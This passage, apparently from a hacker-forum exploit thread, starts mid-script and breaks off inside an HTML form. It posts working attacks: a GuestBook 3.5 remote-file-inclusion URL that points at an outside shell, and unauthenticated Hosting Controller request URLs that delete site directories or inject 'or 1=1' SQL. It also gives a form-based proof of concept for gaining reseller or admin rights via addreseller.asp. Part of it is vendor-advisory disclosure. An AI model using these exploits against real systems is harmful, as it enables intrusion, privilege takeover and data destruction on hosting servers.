echo "Exploit failed \r\n"; ?>

micimacko(HCE)
GuestBook 3.5 Remote Command Execution Xploit:
Code:
http://www.site.com/[scriptpath]/index.php?GB_PATH=http://con shell

black_hat_cr(HCE)
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.
Quote:
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln. SQL_Injection, Command Injection
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006

Discussion:
An unauthenticated user can
1- delete every site's virtual directory on HC sites
2- create a forum virtual directory (with the desired name) for every site on HC!
3- disable all HC forums by SQL injection
4- enable all HC forums by SQL injection
The bugs are in "DisableForum.asp" and "EnableForum.asp" in the forum directory.

Exploit (or PoC):
1- An unauthenticated user can delete every site's virtual directory on HC sites via the forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
2- An unauthenticated user can create a forum virtual directory (with the desired name) for every site on HC via the forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
3- An unauthenticated user can disable all HC forums by SQL injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
4- An unauthenticated user can enable all HC forums by SQL injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1

Credit: Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Institute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
By Pi3cH On 16 Oct 2006

Navaro(HCE)
Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005, Summer
Report date (to HC company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
===============================================
1- This code gives a resadmin session to a user:
Bug in "hosting/addreseller.asp", no check is available.
<script>
    // Build the target URL from the "URL" field typed below and post the
    // form to addreseller.asp with htype=3 (the reseller account type).
    function siteaction() {
        n_act = "/hosting/addreseller.asp?htype=3";
        window.document.all.frm1.action = window.document.all.siteact.value + n_act;
        window.document.all.frm1.submit();
    }
</script>
<hr><br>
Form1<br>
<!-- Base URL of the Hosting Controller site, e.g. http://target -->
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
    <tr>
        <td>reseller</td>
        <td><input type="text" name="reseller" value="hcadmin"></td>
    </tr>
    <tr>
        <td>loginname</td>
        <td><input type="text" name="loginname" value="hcadmin"></td>
    </tr>
    <tr>
        <td>Password</td>
        <td><input type="text" name="Password" value=""></td>
    </tr>
    <tr>
        <td>first_name</td>
        <td><input type="text" name="first_name" value=""></td>
    </tr>
    <tr>
        <td>last_name</td>
        <td><input type="text" name="last_name" value=""></td>
    </tr>
    <tr>
        <td>address</td>
        <td><input type="text" name="address" value=""></td>
    </tr>
    <tr>
        <td>city</td>
        <td><input type="text" name="city" value=""></td>
    </tr>
    <tr>
        <td>state</td>
        <td><input type="text" name="state" value=""></td>
    </tr>
    <tr>
        <td>country</td>
        <td><input type="text" name="country" value=""></td>
    </tr>
    <tr>
        <td>email</td>
        <td><input type="text" name="email" value=""></td>
    </tr>
    <tr>
        <td>phone</td>
        <td><input type="text" name="phone" value=""></td>
    </tr>
    <tr>
        <td>fax</td>
        <td><input type="text" name="fax" value=""></td>
    </tr>
    <tr>
        <td>zip</td>
        <td><input type="text" name="zip" value=""></td>
    </tr>
    <tr>
        <td>selMonth</td>
        <td><input type="text" name="selMonth" value=""></td>
    </tr>
    <tr>
        <td>selYear</td>
        <td><input type="text" name="selYear" value=""></td>
    </tr>
    <tr>